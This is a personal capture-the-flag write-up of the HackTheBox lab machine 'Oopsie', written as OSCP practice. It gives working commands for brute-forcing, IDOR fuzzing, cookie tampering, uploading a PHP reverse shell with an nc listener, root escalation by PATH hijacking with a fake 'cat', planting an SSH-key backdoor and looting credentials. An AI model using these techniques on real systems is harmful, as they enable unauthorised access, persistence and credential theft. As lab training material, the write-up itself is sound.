Box 2: HTB - Oopsie
As a routine, I use Nmap for port scanning and reconnaisance at the beginning. For explanation about nmap syntax and its parameter, visit this site: https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.28 --open
The nmap scanning result is very brief, not as my imagination. There’re only 2 opening ports for us to explore today: 22 (
SSH) and 80 (
PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
There’s not many things I can do here. I run Hydra tool for authentication brute-force with
rockyou.txtin the background, but unfortunately, it cannot find any thing. Meanwhile, I also run
dirsearch to enumerate web site directories for some interesting stuff. Additionallly, I navigate this site to inspect menu, tabs, and view page source…
dirsearch -u http://10.10.10.28 -e html,js,php,old,bakOptions:
-u URL, --url=URL : Target URL
-e EXTENSIONS, --extensions=EXTENSIONS : Extension list separated by commas (Example: php,asp)
dirsearch can detect some directories in this site, but they’re inaccessible when I try to access them. Maybe it need us to authenticate & authorize. There is a login page, however, it redirects to homepage when I try.
In contrast, when navigating the page source, I find a weird directory: /cdn-cgi/login/script.js
This page has quite a bit of content. So you can start with filtering out the links to webpages and scripts with
curl as another way:
curl 10.10.10.28 | grep -E --colour 'href|script'
Fire it in your browser and the login page in front of your eyes right now!
What shall we do next? I had tried to brute-force it with Hydra tool but hopeless. Finally, I used Google-fu and found that the boxes in “HackTheBox” are related to each other. Let’s try reusing the admin password from the previously compromised machine, with common usernames such as administrator or admin. This is my first experience with that behaviour, use it with the later boxes!
Just as successful login, I access “Upload” tab firstly because I think this is normally an attack vector for creating reverse-shell connection. However, it’s not as easy as a piece of cake.
Back to “Account” tab, you will see some information about currently logged in acocunt. “Access ID” is 34322 but on the URL bar, we also notice the paramter “id” equals 1, which for our current admin user. I checked the cookies and found something interesting. The cookie “user” is 34322 too.
I have id of 1 in the URL bar. If I change it to a '2', then I get nothing on the screen. It might be possible to brute force the id values, and display the user value for another user, such as super admin account. We can do this using
wfuzz. I’ll try fuzzing the “id” parameter from 0 to 100.
wfuzz -c -z range,0-100 --hh 3595 -b role=admin -b user=34322 -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
-c : Output with colors
-u url : Specify a URL for the request
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder]. A list of encoders can be used
-b cookie : Specify a cookie for the requests. Repeat option for various cookies
--hh : Don't show for a certain amount of characters in the response
Why did I use
--hh 3595 in this command? Let’s try access URL again with “id” which equals '2'. This parameter value is invalid, then it will response with an empty page as below:
So with invalid “id”, the response pages will be the same and have the same character amount
3595. We surely wanna ignore them and just keep focusing on the HTTP responses which have different content lengths and valid “id”. Let’s view the result from
wfuzz tool as below:
Notice: What is Fuzzing?
To keep it simple, fuzzing can be argued as “fancy bruteforcing” to some degree. However, you can fuzz what you can’t bruteforce. Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different username and passwords much quicker then a human can (and is willing to do…). For more information about
wfuzz tool, please kindly visit this. If you have problems when installing, check this for workaround. I hope it will be helpful.
Another method to do above task is using BurpSuite Intruder. First of all, we will use Proxy mode to capture all traffic we sent to the web server and change browser settings to intercept them in Proxy mode. Then, we plan to send it to Intruder for attack.
Then, let’s move to “Payloads” tab to define value range that we’ll use in fuzzing. To create a list containing 0,1,..,100 value, you can utilize this one-liner command:
for i in $(seq 0 100); do echo $i; done > list.txt. “Load” this list into “Payloads Sets” and click “Attack”.
In the result windows, like we do with
wfuzz, you only need to focus on HTTP response which have different content lengths.
I’ve tried all in this list and with the value “id=30”, we will get the “super admin” AccessID.
Now, we can modify cookie “user” to 86575 in our web browser. After that, try accessing “Upload” tab again, this will be so amazing!!
In the next step, we will upload the reverse shell to this server and run it. If you’re using Kali Linux like me, a collection of webshells for PHP is available in
/usr/share/webshells/. You can check and list all of them with command:
I’ve picked up php-reverse-shell.php in this time. After changing the IP and port values, we upload the file, capture the request, substitute the user
value as before, and click Upload.
So that was a success, but now where did it go? Remind you of the
dirsearch step, we’ve found a directory called ''uploads''. Try 10.10.10.28/uploads and it gives a 301, yayy! Now, we can set up our listener and trigger a reverse shell.
sudo nc -lnvp <port number>
Use browser and move to your reverse-shell location, then ''Enter'' to run it!
http://10.10.10.28/uploads/<your revere-shell file name>.php
Current shell is not tty and quite inconvenient, let’s proceed to upgrade it. We can use
which python or
which python3 to check whether
python3 is available on this machine or not. Python3 is present in
/bin/ so we will run below command to spawn a tty shell (interactive):
python3 -c 'import pty; pty.spawn("/bin/bash")'
In this stage, you can easily find the “user.txt” flag in
/home/robert/. I won’t disclose the flag content is this write-up, you should have enjoy it yourself. Next, it’s a good idea to navigate the web root directory
/var/www/html. I found some script files here and
db.php is one of them. I have credential of
robertfor mysql, does that work elsewhere?
Yes, we still have another opening service port - SSH.
ssh email@example.com → Enter → Provide the password
Now that we are
robert, again, look around the home directory and see what we got. After looking through these files, we don’t find anything juicy. I considered using
find command to list all of interesting files that
robert have permission to access. After minutes of getting stuck, I used
id command and found
robert is a member of the weird
So we can enumerate the filesystem to see if this weird group has any special access.
find / -type f -group bugtracker 2> /dev/null
The only file found is
/usr/bin/bugtracker , this executable file is suspicious and let’s inspect it. So I’ll look at the libraries using ldd but there is nothing exploitable there since I cant hijack those paths. After Google-fu, I run
strings to see if I can get an idea of what the program has hard-coded. I then run
ltraceto see exactly what the calls do. So far, this’s my first time with 2 these commands, I don’t have a lot of information or cheat about them therefore. Research them later, when possible!
strings command explanation: https://www.lifewire.com/strings-linux-command-4093452
ltrace command explanation: https://man7.org/linux/man-pages/man1/ltrace.1.html
Looking at the output, it looks like a system command is calling the
cat command and looking at the
setuidline, it is setting the UID as 0 which is root. We see that it calls the cat binary using this relative path instead of the absolute path. By creating a malicious cat and modifying the path to include the current working directory, we should be able to manipulate this misconfiguration, and escalate our privileges to root.
Let’s add the current working directory to PATH, create the malicious binary and make it executable.
echo '/bin/sh' > cat
chmod +x cat
Finally, we can execute
/usr/bin/bugtracker to get root login. Remember that we changed path to run
cat command, so we need to use absolute path
/bin/cat to read the file content instead of the normal
cat. You will easily find the ''root.txt'' flag in
/root/. Let’s explore it by yourself.
I was afraid of losing this connection and consider setting up a backdoor, so I’ll create a basic ssh key (
ssh-keygen) and upload it to the
authorized_keysfile for root. Now I can get in as root anytime. On your own machine, use
ssh-keygen command to generate key pair for SSH. So then, 2 key files are created:
id_rsa(private key) and
id_rsa.pub(public key). Try to copy the public key to
authorized_keys file on Victim machine (10.10.10.28) at SSH directory:
~/.ssh/. Try connecting SSH from my Kali machine to this box with private key already created:
Call Google-sama and I found the reason for this. I’ve changed permission for this file with command:
chmod 600 id_rsa. Visit this for understanding file permission in Linux.
Now time to loot, so I pull all the
passwd file for credentials. As my above experience, they may be useful for the next several boxes!
There is a file inside of the
.config directory that has some additional credentials. Based on the last box, I’ll add all these I found to my crendential file because password reuse may be a theme here!
Finally, this is also the 2nd box on my journey to pursue OSCP exam. I’ll try to complement the details much more when possible.
THANKS FOR READING AND SUPPORTING!